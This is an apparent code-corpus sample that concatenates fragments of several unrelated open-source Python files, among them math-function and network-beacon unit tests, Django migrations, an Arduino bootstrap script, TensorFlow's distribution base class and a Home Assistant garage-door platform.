self.assertEqual((0, '<b>foo</b>\n'), _GrumpRun(textwrap.dedent("""\
def bold(fn):
return lambda: '<b>' + fn() + '</b>'
@bold
def foo():
return 'foo'
print foo()""")))
def testFunctionDecoratorWithArg(self):
self.assertEqual((0, '<b id=red>foo</b>\n'), _GrumpRun(textwrap.dedent("""\
def tag(name):
def bold(fn):
return lambda: '<b id=' + name + '>' + fn() + '</b>'
return bold
@tag('red')
def foo():
return 'foo'
print foo()""")))
def testFunctionDef(self):
self.assertEqual((0, 'bar baz\n'), _GrumpRun(textwrap.dedent("""\
def foo(a, b):
print a, b
foo('bar', 'baz')""")))
def testFunctionDefGenerator(self):
self.assertEqual((0, "['foo', 'bar']\n"), _GrumpRun(textwrap.dedent("""\
def gen():
yield 'foo'
yield 'bar'
print list(gen())""")))
def testFunctionDefGeneratorReturnValue(self):
self.assertRaisesRegexp(
util.ParseError, 'returning a value in a generator function',
_ParseAndVisit, 'def foo():\n yield 1\n return 2')
def testFunctionDefLocal(self):
self.assertEqual((0, 'baz\n'), _GrumpRun(textwrap.dedent("""\
def foo():
def bar():
print 'baz'
bar()
foo()""")))
def testIf(self):
self.assertEqual((0, 'foo\n'), _GrumpRun(textwrap.dedent("""\
if 123:
print 'foo'
if '':
print 'bar'""")))
def testIfElif(self):
self.assertEqual((0, 'foo\nbar\n'), _GrumpRun(textwrap.dedent("""\
if True:
print 'foo'
elif False:
print 'bar'
if False:
print 'foo'
elif True:
print 'bar'""")))
def testIfElse(self): |
sn6uv/gmpy_cffi | tests/test_special_functions.py | Python | bsd-3-clause | 9,191 | 0.002176 | import sys
import pytest
from gmpy_cffi import (
log, log2, log10, exp, exp2, exp10, cos, sin, tan, sin_cos, sec, csc, cot,
acos, asin, atan, atan2, cosh, sinh, tanh, sinh_cosh, sech, csch, coth,
acosh, asinh, atanh, factorial, log1p, expm1, eint, li2, gamma, lngamma,
lgamma, digamma, zeta, erf, erfc, j0, j1, jn, y0, y1, yn, fma, fms, agm,
hypot, ai, const_log2, const_pi, const_euler, const_catalan,
mpfr, mpq, mpz, mpc)
class TestTrig(object):
def test_init_check(self):
assert log(mpfr(0.5)) == log(mpq(1, 2)) == mpfr('-0.69314718055994529')
assert log(2) == log(mpz(2)) == mpfr('0.69314718055994529')
with pyt | est.raises(TypeError):
log([])
def test_log(self):
assert log(0.5) == mpfr('-0.69314718055994529')
assert log(0.5+0.7j) == mpc('-0.15055254639196086+0.95054684081207508j')
def test_log2(self):
assert log2(0.5) == mpfr('-1.0')
def test_log10(self):
assert log10(0.5) == mpfr('-0.3010299956639812')
# assert log10(0.5+0.7j) == mpc(' | -0.065384140134511923+0.41281724775525297j')
def test_exp(self):
assert exp(0.5) == mpfr('1.6487212707001282')
assert exp(0.5+0.7j) == mpc('1.2610115829047472+1.0621354039100237j')
def test_exp2(self):
assert exp2(0.5) == mpfr('1.4142135623730951')
def test_exp10(self):
assert exp10(0.5) == mpfr('3.1622776601683795')
def test_cos(self):
assert cos(0.5) == mpfr('0.87758256189037276')
assert cos(0.5+0.7j) == mpc('1.1015144315669947-0.36368439983078849j')
def test_sin(self):
assert sin(0.5) == mpfr('0.47942553860420301')
assert sin(0.5+0.7j) == mpc('0.60176007656391672+0.66571982846862043j')
def test_tan(self):
assert tan(0.5) == mpfr('0.54630248984379048')
assert tan(0.5+0.7j) == mpc('0.31267491960977917+0.70760291160255884j')
def test_acos(self):
assert acos(0.5) == mpfr('1.0471975511965979')
assert acos(0.5+0.7j) == mpc('1.1619717971477033-0.70341059318814581j')
def test_asin(self):
assert asin(0.5) == mpfr('0.52359877559829893')
assert asin(0.5+0.7j) == mpc('0.40882452964719346+0.70341059318814581j')
def test_atan(self):
assert atan(0.5) == mpfr('0.46364760900080609')
assert atan(0.5+0.7j) == mpc('0.65821413412081531+0.55575811532302299j')
def test_sin_cos(self):
assert sin_cos(0.5) == sin_cos(mpfr(0.5)) == (sin(0.5), cos(0.5))
assert sin_cos(0) == (mpfr(0.0), mpfr(1.0))
assert sin_cos(mpq(1, 3)) == (sin(mpq(1, 3)), cos(mpq(1, 3)))
assert sin_cos(mpz(3)) == (sin(mpz(3)), cos(mpz(3)))
with pytest.raises(TypeError):
sin_cos([])
assert sin_cos(0.5+0.7j) == (
mpc('0.60176007656391672+0.66571982846862043j'),
mpc('1.1015144315669947-0.36368439983078849j'))
assert sin_cos(mpc(0.5+0.7j)) == (sin(mpc(0.5+0.7j)), cos(mpc(0.5+0.7j)))
def test_sec(self):
assert sec(0.5) == mpfr('1.139493927324549')
def test_csc(self):
assert csc(0.5) == mpfr('2.0858296429334882')
def test_cot(self):
assert cot(0.5) == mpfr('1.830487721712452')
def test_acos(self):
assert acos(0.5) == mpfr('1.0471975511965979')
assert acos(0.5+0.7j) == mpc('1.1619717971477033-0.70341059318814581j')
def test_asin(self):
assert asin(0.5) == mpfr('0.52359877559829893')
assert asin(0.5+0.7j) == mpc('0.40882452964719346+0.70341059318814581j')
def test_atan(self):
assert atan(0.5) == mpfr('0.46364760900080609')
assert atan(0.5+0.7j) == mpc('0.65821413412081531+0.55575811532302299j')
def test_atan2(self):
assert atan2(1, 2) == atan2(1.0, 2) == atan2(mpfr(1), 2) == mpfr('0.46364760900080609')
assert atan2(1.5, mpfr(3.1)) == atan2(1.5, 3.1) == mpfr('0.45066132608063364')
assert atan2(mpq(1, 2), 0.5) == atan2(0.5, mpq(1, 2)) == atan2(0.5, 0.5)
assert atan2(mpz(3), mpz(2)) == atan2(3, 2) == mpfr('0.98279372324732905')
with pytest.raises(TypeError):
atan2(1.4, [])
with pytest.raises(TypeError):
atan2([], 1.4)
def test_sinh(self):
assert sinh(0.5) == mpfr('0.52109530549374738')
assert sinh(0.5+0.7j) == mpc('0.39855567323751645+0.72643659137442362j')
def test_cosh(self):
assert cosh(0.5) == mpfr('1.1276259652063807')
assert cosh(0.5+0.7j) == mpc('0.86245590966723074+0.33569881253559997j')
def test_tanh(self):
assert tanh(0.5) == mpfr('0.46211715726000974')
assert tanh(0.5+0.7j) == mpc('0.68602943183000187+0.57526108892459082j')
def test_sinh_cosh(self):
assert sinh_cosh(0.5) == sinh_cosh(mpfr(0.5)) == (sinh(0.5), cosh(0.5))
assert sinh_cosh(0) == (mpfr(0.0), mpfr(1.0))
assert sinh_cosh(mpq(1, 3)) == (sinh(mpq(1, 3)), cosh(mpq(1, 3)))
assert sinh_cosh(mpz(3)) == (sinh(mpz(3)), cosh(mpz(3)))
with pytest.raises(TypeError):
sinh_cosh([])
def test_sech(self):
assert sech(0.5) == mpfr('0.88681888397007391')
def test_csch(self):
assert csch(0.5) == mpfr('1.9190347513349437')
def test_coth(self):
assert coth(0.5) == mpfr('2.1639534137386529')
def test_acosh(self):
assert acosh(1.5) == mpfr('0.96242365011920694')
assert acosh(0.5+0.7j) == mpc('0.70341059318814581+1.1619717971477033j')
def test_asinh(self):
assert asinh(0.5) == mpfr('0.48121182505960347')
assert asinh(0.5+0.7j) == mpc('0.58742022866413157+0.63658730712537337j')
def test_atanh(self):
assert atanh(0.5) == mpfr('0.549306144334054846')
assert atanh(0.5+0.7j) == mpc('0.32726575329597513+0.69358700031280818j')
class TestSpecial(object):
def test_factorial(self):
assert factorial(10**3) == mpfr('4.0238726007709379e+2567')
with pytest.raises(ValueError):
factorial(-3)
with pytest.raises(TypeError):
factorial(0.5)
def test_log1p(self):
assert log1p(1.4) == mpfr('0.87546873735389985')
def test_expm1(self):
assert expm1(2.4) == mpfr('10.023176380641601')
def test_eint(self):
assert eint(0.5) == mpfr('0.4542199048631736')
def test_li2(self):
assert li2(0.5) == mpfr('0.58224052646501245')
def test_gamma(self):
assert gamma(0.5) == mpfr('1.7724538509055161')
def test_lngamma(self):
assert lngamma(0.5) == mpfr('0.57236494292470008')
def test_lgamma(self):
assert lgamma(0.5) == (mpfr('0.57236494292470008'), 1)
assert lgamma(-0.0) == (mpfr('inf'), -1)
def test_digamma(self):
assert digamma(0.5) == mpfr('-1.9635100260214235')
def test_zeta(self):
assert zeta(0.5) == mpfr('-1.4603545088095868')
def test_erf(self):
assert erf(0.5) == mpfr('0.52049987781304652')
def test_erfc(self):
assert erfc(0.5) == mpfr('0.47950012218695348')
def test_j0(self):
assert j0(0.5) == mpfr('0.93846980724081286')
def test_j1(self):
assert j1(0.5) == mpfr('0.2422684576748739')
def test_jn(self):
assert jn(0.5, 4) == mpfr('0.00016073647636428759')
with pytest.raises(TypeError):
jn(0.5, sys.maxsize+1)
with pytest.raises(TypeError):
jn(0.5, -sys.maxsize-2)
def test_y0(self):
assert y0(0.5) == mpfr('-0.44451873350670656')
def test_y1(self):
assert y1(0.5) == mpfr('-1.4714723926702431')
def test_yn(self):
assert yn(0.5, 4) == mpfr('-499.27256081951231')
with pytest.raises(TypeError):
yn(0.5, sys.maxsize+1)
with pytest.raises(TypeError):
yn(0.5, -sys.maxsize-2)
def test_fma(self):
assert fma(0.5, 0.7, 1.1) == mpfr('1.4500000000000002')
assert fma(3, 1, 0.5+0.1j) == mpc('3.5+0.10000000000000001j')
def test_fms(self):
assert fms(0.5, 0.7, 1.1) == mpfr('-0.75000000000000011')
assert fms(0.5, mpfr(0.7), 1.1) == mpfr('-0.75000000000000011')
assert fms(0.5, 0.7, mpfr( |
zeromq/pyre | tests/test_zbeacon.py | Python | lgpl-3.0 | 2,243 | 0.002675 | import unittest
import zmq
import struct
import uuid
import socket
from pyre.zactor import ZActor
from pyre.zbeacon import ZBeacon
class ZBeaconTest(unittest.TestCase):
def setUp(self, *args, **kwargs):
ctx = zmq.Context()
ctx = zmq.Context()
# two beacon frames
self.transmit1 = struct.pack('cccb16sH', b'Z', b'R', b'E',
1, uuid.uuid4().bytes,
socket.htons(9999))
self.transmit2 = struct.pack('cccb16sH', b'Z', b'R', b'E',
1, uuid.uuid4().bytes,
socket.htons(9999))
self.node1 = ZActor(ctx, ZBeacon)
self.node1.send_unicode("VERBOSE")
self.node1.send_unicode("CONFIGURE", zmq.SNDMORE)
self.node1.send(struct.pack("I", 9999))
print("Hostname 1:", self.node1.recv_unicode())
self.node2 = ZActor(ctx, ZBeacon)
self.node2.send_unicode("VERBOSE")
self.node2.send_unicode("CONFIGURE", zmq.SNDMORE)
self.node2.send(struct.pack("I", 9999))
print("Hostname 2:", self.node2.recv_unicode())
# end setUp
def tearDown(self):
self.node1.destroy()
self.node2.destr | oy()
# end tearDown
def test_node1(self):
self.node1.send_unicode("PUBLISH", zmq.SNDMORE)
self.node1.send(self.transmit1)
def test_node2(self):
self.node2.send_unicode("PUBLISH", zmq.SNDMORE)
self.node2.send(self.transmit2)
def test_recv_beacon1(self):
self.node1.send_unicode("PUBLISH", zmq.SNDMORE)
self.node1.send(self.transmit1)
self.node2.send_unicode("PUBLISH", zmq.SNDMORE)
self.node2.send(self.transmit2)
| req = self.node1.recv_multipart()
self.assertEqual(self.transmit2, req[1])
def test_recv_beacon2(self):
self.node1.send_unicode("PUBLISH", zmq.SNDMORE)
self.node1.send(self.transmit1)
self.node2.send_unicode("PUBLISH", zmq.SNDMORE)
self.node2.send(self.transmit2)
req = self.node2.recv_multipart()
self.assertEqual(self.transmit1, req[1])
# end ZBeaconTest
if __name__ == '__main__':
try:
unittest.main()
except Exception as a:
print(a)
|
nino-c/plerp.org | src/portfolio/migrations/0012_canvasappportfolioitem_appname.py | Python | mit | 431 | 0 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class | Migration(migrations.Migration):
dependencies = [
('portfolio', '0011_auto_20160115_0105'),
]
operations = [
migrations.AddField(
model_name='canvasappportfolioitem',
name='appname',
field=models.CharField(max_length=100, | null=True),
),
]
|
aphelps/HMTL | python/Bootstrap.py | Python | mit | 3,352 | 0.002685 | #!/usr/bin/python
#
# Bootstrap script for a new device. This uploads a configuration and installs
# the Bringup sketch.
#
import sys
import os
import argparse
import subprocess
import hmtl.portscan as portscan
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config", dest="config",
required=True,
help="JSON configuration file")
parser.add_argument("-d", "--device", dest="device",
he | lp="Arduino USB device")
parser.add_argument("-i", "--deviceid", dest="deviceid",
required=True,
help="Device ID to configure")
parser.add_argument("-a", "--address", dest="address",
help="Address to configure (defaults to device ID)")
parser.add_argument("-t", "--type", dest="type",
default="nano",
| help="Device type for platformio scripts (nano, mini, uno, moteinomega, etc) [%(default)s)]")
parser.add_argument("-s", "--stages", dest="stages",
default="1,2,3",
help="Stages to execute [%(default)s]")
parser.add_argument("--module", dest="module",
default=False, action='store_true',
help="Initially load module code")
options = parser.parse_args()
if options.device == None:
options.device = portscan.choose_port()
return options
def main():
options = parse_args()
if not os.path.exists(options.config):
print("Config file %s does not exist" % options.config)
sys.exit(1)
config_path = os.path.abspath(options.config)
if not options.deviceid:
print("Must specify a device ID")
sys.exit(1)
if not options.address:
options.address = options.deviceid
stages = [int(x) for x in options.stages.split(",")]
platformio_cmd = ["platformio", "run", "-t", "upload", "-e",
"%s" % options.type]
if 1 in stages:
# Upload the python configuration sketch
os.chdir("/Users/amp/Dropbox/Arduino/HMTL/platformio/HMTLPythonConfig")
print("Executing: %s cwd:%s" % (platformio_cmd, os.getcwd()))
ret = subprocess.call(platformio_cmd)
if ret != 0:
print("Uploading configuration sketch failed: %s" % ret)
sys.exit(1)
if 2 in stages:
# Upload a configuration
command = "HMTLConfig -f %s -i %s -a %s -v -w -d %s" % \
(config_path, options.deviceid, options.address, options.device)
print("Executing: %s" % command)
ret = os.system(command)
#ret = subprocess.call(command)
if ret != 0:
print("HMTLConfig call failed: %s" % ret)
sys.exit(1)
if 3 in stages:
# Upload the initial sketch
if options.module:
sketch="/Users/amp/Dropbox/Arduino/HMTL/platformio/HMTL_Module"
else:
sketch="/Users/amp/Dropbox/Arduino/HMTL/platformio/HMTL_Bringup"
os.chdir(sketch)
print("Executing: %s cwd:%s" % (platformio_cmd, os.getcwd()))
ret = subprocess.call(platformio_cmd)
if ret != 0:
print("Uploading bringup sketch failed: %s" % ret)
sys.exit(1)
main() |
laosiaudi/tensorflow | tensorflow/contrib/distributions/python/ops/distribution.py | Python | apache-2.0 | 33,964 | 0.005565 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base classes for probability distributions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import contextlib
import inspect
import types
import warnings
import numpy as np
import six
from tensorflow.contrib import framework as contrib_framework
from tensorflow.contrib.distributions.python.ops import distribution_util
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
_DISTRIBUTION_PUBLIC_METHOD_WRAPPERS = [
"batch_shape", "get_batch_shape", "event_shape", "get_event_shape",
"sample_n", "log_prob", "prob", "log_cdf", "cdf", "log_survival_function",
"survival_function", "entropy", "mean", "variance", "std", "mode"]
@six.add_metaclass(abc.ABCMeta)
class _BaseDistribution(object):
"""Abstract base class needed for resolving subclass hierarchy."""
pass
def _copy_fn(fn):
"""Create a deep copy of fn.
Args:
fn: a callable
Returns:
A `FunctionType`: a deep copy of fn.
Raises:
TypeError: if `fn` is not a callable.
"""
if not callable(fn):
raise TypeError("fn is not callable: %s" % fn)
# The blessed way to copy a function. copy.deepcopy fails to create
# a non-reference copy. Since:
# types.FunctionType == type(lambda: None),
# and the docstring for the function type states:
#
# function(code, globals[, name[, argdefs[, closure]]])
#
# Create a function object from a code object and a dictionary.
# ...
#
# Here we can use this to create a new function with the old function's
# code, globals, closure, etc.
return types.FunctionType(
code=fn.__code__, globals=fn.__globals__,
name=fn.__name__, argdefs=fn.__defaults__,
closure=fn.__closure__)
def _update_docstring(old_str, append_str):
"""Update old_str by inserting append_str just before the "Args:" section."""
old_str_lines = old_str.split("\n")
# Step 0: Prepend spaces to all lines of append_str. This is
# necessary for correct markdown generation.
append_str = "\n".join(" %s" % line for line in append_str.split("\n"))
# Step 1: Find mention of "Args":
has_args_ix = [
ix for ix, line in enumerate(old_str_lines)
if line.strip().lower() == "args:"]
if has_args_ix:
final_args_ix = has_args_ix[-1]
return ("\n".join(old_str_lines[:final_args_ix])
+ "\n\n" + append_str + "\n\n"
+ "\n".join(old_str_lines[final_args_ix:]))
else:
return old_str + "\n\n" + append_str
class _DistributionMeta(abc.ABCMeta):
def __new__(mcs, classname, baseclasses, attrs):
"""Control the creation of subclasses of the Distribution class.
The main purpose of this method is to properly propagate docstrings
from private Distribution methods, like `_log_prob`, into their
public wrappers as inherited by the Distribution base class
(e.g. `log_prob`).
Args:
classname: The name of the subclass being created.
baseclasses: A tuple of parent classes.
attrs: A dict mapping new attributes to their values.
Returns:
The class object.
Raises:
TypeError: If `Distribution` is not a subclass of `BaseDistribution`, or
the new class is derived via multiple inheritance and the first
parent class is not a subclass of `BaseDistribution`.
AttributeError: If `Distribution` does not implement e.g. `log_prob`.
ValueError: If a `Distribution` public method lacks a docstring.
"""
if not baseclasses: # Nothing to be done for Distribution
raise TypeError("Expected non-empty baseclass. Does Distribution "
"not subclass _BaseDistribution?")
which_base = [
base for base in baseclasses
if base == _BaseDistribution or issubclass(base, Distribution)]
base = which_base[0]
if base == _BaseDistribution: # Nothing to be done for Distribution
return abc.ABCMeta.__new__(mcs, classname, baseclasses, attrs)
if not issubclass(base, Distribution):
raise TypeError("First parent class declared for %s must be "
"Distribution, but saw '%s'" % (classname, base.__name__))
for attr in _DISTRIBUTION_PUBLIC_METHOD_WRAPPERS:
special_attr = "_%s" % attr
class_attr_value = attrs.get(attr, None)
if attr in attrs:
# The method is being overridden, do not update its docstring
continue
base_attr_value = getattr(base, attr, None)
if not base_attr_value:
raise AttributeError(
"Internal error: expected base class '%s' to implement method '%s'"
% (base.__name__, attr))
class_special_attr_value = attrs.get(special_attr, None)
if class_special_attr_value is None:
# No _special method available, no need to update the docstring.
continue
class_special_attr_docstring = inspect.getdoc(class_special_attr_value)
if not class_special_attr_docstring:
# No docstring to append.
continue
class_attr_value = _copy_fn(base_attr_value)
class_attr_docstring = inspect.getdoc(base_attr_value)
if class_attr_docstring is None:
raise ValueError(
"Expected base class fn to contain a docstring: %s.%s"
| % (base.__name__, attr))
class_attr_value.__doc__ = _update_docstring(
class_attr_value.__doc__,
("Additional documentation from `%s`:\n\n%s"
% (classname, class_special_attr_docstring)))
attrs[attr] = class_attr_value
return abc | .ABCMeta.__new__(mcs, classname, baseclasses, attrs)
@six.add_metaclass(_DistributionMeta)
class Distribution(_BaseDistribution):
"""A generic probability distribution base class.
`Distribution` is a base class for constructing and organizing properties
(e.g., mean, variance) of random variables (e.g, Bernoulli, Gaussian).
### Subclassing
Subclasses are expected to implement a leading-underscore version of the
same-named function. The argument signature should be identical except for
the omission of `name="..."`. For example, to enable `log_prob(value,
name="log_prob")` a subclass should implement `_log_prob(value)`.
Subclasses can append to public-level docstrings by providing
docstrings for their method specializations. For example:
```python
@distribution_util.AppendDocstring("Some other details.")
def _log_prob(self, value):
...
```
would add the string "Some other details." to the `log_prob` function
docstring. This is implemented as a simple decorator to avoid python
linter complaining about missing Args/Returns/Raises sections in the
partial docstrings.
### Broadcasting, batching, and shapes
All distributions support batches of independent distributions of that type.
The batch shape is determined by broadcasting together the parameters.
The shape of arguments to `__init__`, `cdf`, `log_cdf`, `prob`, and
`log_prob` reflect this broadcasting, as does the return value of `sample` and
`sample_n`.
`sample_n_shape = (n,) + batch_shape + event_shape`, where `sample_n_shape` is
the shape of the `Tensor` returned from `sample_n`, `n` is the number of
samples, `batch_shape` defines how many independent distributions there ar |
jgmize/tulsawebdevs.org | talks/migrations/0003_auto_20150816_2148.py | Python | gpl-3.0 | 722 | 0.00277 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django_extensions.db.fields
class Migration(migrations.Migration):
dependencies = [
('talks', '0002_auto_20150808_2108'),
]
operations = [
migrations.AlterField(
model_name='speaker',
name='slug',
field=django_extensions.db.fields.AutoSlugField(verbose_name='Slug', blank=True, populate_from='get_name', editable=False),
),
| migrations.AlterField(
model_name='talk',
name='speaker',
field=models.ForeignKey( | null=True, blank=True, related_name='talks', to='talks.Speaker'),
),
]
|
GooseDad/Test | riding_forecast.py | Python | apache-2.0 | 8,045 | 0.00087 | import csv
import datetime
from scipy.stats import norm
from regional_poll_interpolator import RegionalPollInterpolator
import riding_poll_model
party_long_names = {
'cpc': 'Conservative/Conservateur',
'lpc': 'Liberal/Lib',
'ndp': 'NDP-New Democratic Party/NPD-Nouveau Parti d',
'gpc': 'Green Party/Parti Vert',
'bq': 'Bloc Qu',
'oth': 'Independent',
}
province_to_region = {
'Newfoundland and Labrador': 'ATL',
'Prince Edward Island': 'ATL',
'Nova Scotia': 'ATL',
'New Brunswick': 'ATL',
'Quebec': 'QC',
'Ontario': 'ON',
'Manitoba': 'SK_MB',
'Saskatchewan': 'SK_MB',
'Alberta': 'AB',
'British Columbia': 'BC',
'Yukon': 'Canada',
'Northwest Territories': 'Canada',
'Nunavut': 'Canada',
}
province_abbreviations = {
'Newfoundland and Labrador': 'NL',
'Prince Edward Island': 'PE',
'Nova Scotia': 'NS',
'New Brunswick': 'NB',
'Quebec': 'QC',
'Ontario': 'ON',
'Manitoba': 'MB',
'Saskatchewan': 'SK',
'Alberta': 'AB',
'British Columbia': 'BC',
'Yukon': 'YT',
'Northwest Territories': 'NT',
'Nunavut': 'NU',
}
provinces_by_numeric_code = {
'10': 'NL',
'11': 'PE',
'12': 'NS',
'13': 'NB',
'24': 'QC',
'35': 'ON',
'46': 'MB',
'47': 'SK',
'48': 'AB',
'59': 'BC',
'60': 'YT',
'61': 'NT',
'62': 'NU',
}
def WhichParty(s):
"""If the given string contains a party name, return its abbreviation."""
for abbreviation, long_name in party_long_names.items():
if long_name in s:
return abbreviation
return None
def WhichRegion(s):
"""If the given string contains a province name, return its region code."""
for province, region in province_to_region.items():
if province in s:
return region
return None
def WhichProvince(s):
"""If the given string contains a province name, return its short form."""
for province, abbr in province_abbreviations.items():
if province in s:
return abbr
return None
def NormalizeDictVector(d):
"""Adjusts numerical values so they add up to 1."""
normalized = {}
divisor = sum(d.values())
for key in d:
normalized[key] = d[key] / divisor
return normalized
def KeyWithHighestValue(d, forbidden_keys=[]):
"""Return the key with the highest value.
Optionally, a list of forbidden keys can be provided. If so, the function
will return the key with the next-highest value, but which is not
forbidden.
"""
mv = -1
mk = None
for k, v in d.items():
if k in forbidden_keys:
continue
if v > mv:
mk = k
mv = v
return mk
# Load regional polling data.
interpolator = RegionalPollInterpolator()
interpolator.LoadFromCsv('regional_poll_averages.csv')
interpolator.LoadFromCsv('regional_baseline.csv')
baseline_date = datetime.datetime(2011, 5, 2)
# Load and process per-riding election results from 2011.
old_ridings = {}
with open('table_tableau12.csv') as csv_file:
reader = csv.DictReader(csv_file)
for row in reader:
riding_name = row['Electoral District Name/Nom de circonscription']
riding_number = row['Electoral District Number']
popular_vote = float(row['Percentage of Votes Obtained'])
party = WhichParty(row['Candidate/Candidat'])
if not party:
continue
province = WhichProvince(row['Province'])
region = WhichRegion(row['Province'])
assert region
before = interpolator.Interpolate(region, party, baseline_date)
after = interpolator.GetMostRecent(region, party)
if before > 2: # As in 2% not 200%
projected_gain = after / before
else:
projected_gain = 1
projection = popular_vote * projected_gain
if not riding_number in old_ridings:
old_ridings[riding_number] = {
'2011': {}, 'projections': {},
'name': riding_name,
'number': riding_number,
'province': province}
r = old_ridings[riding_number]
r['2011'][party] = popular_vote
r['projections'][party] = projection
# Calculate the transposition from old ridings (2003) to new ridings (2013).
new_ridings = {}
with open('TRANSPOSITION_338FED.csv') as csv_file:
# Skip the first few lines of the file, to get to the data part.
for i in range(4):
next(csv_file)
reader = csv.DictReader(csv_file)
for row in reader:
new_riding_number = row['2013 FED Number']
if not new_riding_number:
continue
new_riding_name = row['2013 FED Name']
old_riding_number = row['2003 FED Number from which the 2013 ' +
'FED Number is constituted']
prov_num_code = row['Province and territory numeric code']
province = provinces_by_numeric_code[prov_num_code]
assert province
population_2013 = float(row['2013 FED - Population'])
population_transferred = float(
row['Population transferred to 2013 FED'])
population_percent = population_transferred / population_2013
all_votes = row['All votes']
electors = row['Electors on lists']
if new_riding_number not in new_ridings:
new_ridings[new_riding_number] = {
'name': new_riding_name,
'number': new_riding_number,
'province': province,
'feeders': {},
'total_votes_2011': 0,
'total_electors_2011': 0,
'population': int(population_2013)}
r = new_ridings[new_riding_number]
r['feeders'][old_riding_number] = population_percent
r['total_votes_2011'] += int(all_votes)
r['total_electors_2011'] += int(electors)
# Output final stats for each riding.
party_order = ['cpc', 'ndp', 'lpc', 'gpc', 'bq', 'oth']
readable_party_names = {
'cpc': 'CON',
'lpc': 'LIB',
'ndp': 'NDP',
'gpc': 'GRN',
'bq': 'BQ',
'oth': 'OTH',
}
with open('riding_forecasts.csv', 'wb') as csv_file:
csv_writer = csv.writer(csv_file)
csv_writer.writerow(
['province', 'name', 'number,'] +
[readable_party_names[p].lower() for p in party_order] +
['projected_winner', 'strategic_vote', 'confidence', 'turnout_2011'])
for r in new_ridings.values():
projections = {}
riding_name = r['name']
riding_number = str(r['number'])
province = r['province']
# Project this riding by mixing old-riding projections.
fo | r feeder_number, weight in r['feeders'].items():
| feeder = old_ridings[feeder_number]
normalized = NormalizeDictVector(feeder['projections'])
for party, support in normalized.items():
if party not in projections:
projections[party] = 0
projections[party] += support * weight
# Upgrade the projections for ridings that have local polling data.
projections = riding_poll_model.projections_by_riding_number.get(
riding_number, projections)
ordered_projections = [projections.get(p, 0) for p in party_order]
projected_winner = KeyWithHighestValue(projections)
runner_up = KeyWithHighestValue(projections, [projected_winner])
strategic_vote = KeyWithHighestValue(projections, ['cpc'])
gap = projections[projected_winner] - projections[runner_up]
projected_winner = readable_party_names[projected_winner]
strategic_vote = readable_party_names[strategic_vote]
confidence = norm.cdf(gap / 0.25)
turnout = float(r['total_votes_2011']) / r['total_electors_2011']
csv_writer.writerow([province, riding_name, riding_number] +
ordered_projections +
[projected_winner, strategic_vote, confidence,
turnout])
|
xloc/SwimmingPool | Questions Submit/Q1/Q1_xiong.py | Python | unlicense | 189 | 0.031746 | workhour=input('enter work hour:')
workra | te=input('enter work rate:')
if workhour>40:
pay=40*workrate+(workhour-40)*workrate*1.5
else:
pay=workhour*workrate
print 'pay:', | pay
|
rbtcollins/lmirror | l_mirror/tests/logging_resource.py | Python | gpl-3.0 | 2,057 | 0.004861 | #
# LMirror is Copyright (C) 2010 Robert Collins <robertc@robertcollins.net>
#
# LMirror is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see <http://www.gnu.org/ | licenses/>.
#
# In the LMirror source tree the file COPYING.txt contains the GNU General Public
# License version 3.
#
"""A test resource to provide isolation for the logging module (sigh, globals)."""
__all__ = ['LoggingResourceManager']
import logging
from testresources import TestResourceManager
from l_mirror.tests.monkeypatch import mon | keypatch
class OldState:
def __init__(self, restore_functions):
self.restore_functions = restore_functions
def tearDown(self):
for fn in self.restore_functions:
fn()
class LoggingResourceManager(TestResourceManager):
"""A resource for testing logging module using code.
This resource resets the global logging state around a test.
"""
def __getattribute__(self, attr):
if attr == '_dirty':
return True
return object.__getattribute__(self, attr)
def make(self, dep_resources):
new_root = logging.RootLogger(logging.WARNING)
new_manager = logging.Manager(new_root)
new_manager.emittedNoHandlerWarning = 1
return OldState([monkeypatch('logging.root', new_root),
monkeypatch('logging.Logger.root', new_root),
monkeypatch('logging.Logger.manager', new_manager)])
def isDirty(self):
return True
def clean(self, resource):
resource.tearDown()
|
JshWright/home-assistant | homeassistant/components/cover/opengarage.py | Python | apache-2.0 | 6,089 | 0 | """
Platform for the opengarage.io cover component.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/cover.opengarage/
"""
import logging
import voluptuous as vol
import requests
from homeassistant.components.cover import (
CoverDevice, PLATFORM_SCHEMA, SUPPORT_OPEN, SUPPORT_CLOSE)
from homeassistant.const import (
CONF_DEVICE, CONF_NAME, STATE_UNKNOWN, STATE_CLOSED, STATE_OPEN,
CONF_COVERS, CONF_HOST, CONF_PORT)
import homeassistant.helpers.config_validation as cv
DEFAULT_NAME = 'OpenGarage'
DEFAULT_PORT = 80
CONF_DEVICEKEY = "device_key"
ATTR_SIGNAL_STRENGTH = "wifi_signal"
ATTR_DISTANCE_SENSOR = "distance_sensor"
ATTR_DOOR_STATE = "door_state"
STATE_OPENING = "opening"
STATE_CLOSING = "closing"
STATE_STOPPED = "stopped"
STATE_OFFLINE = "offline"
STATES_MAP = {
0: STATE_CLOSED,
1: STATE_OPEN
}
# Validation of the user's configuration
COVER_SCHEMA = vol.Schema({
vol.Required(CONF_DEVICEKEY): cv.string,
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_NAME): cv.string
})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_COVERS): vol.Schema({cv.slug: COVER_SCHEMA}),
})
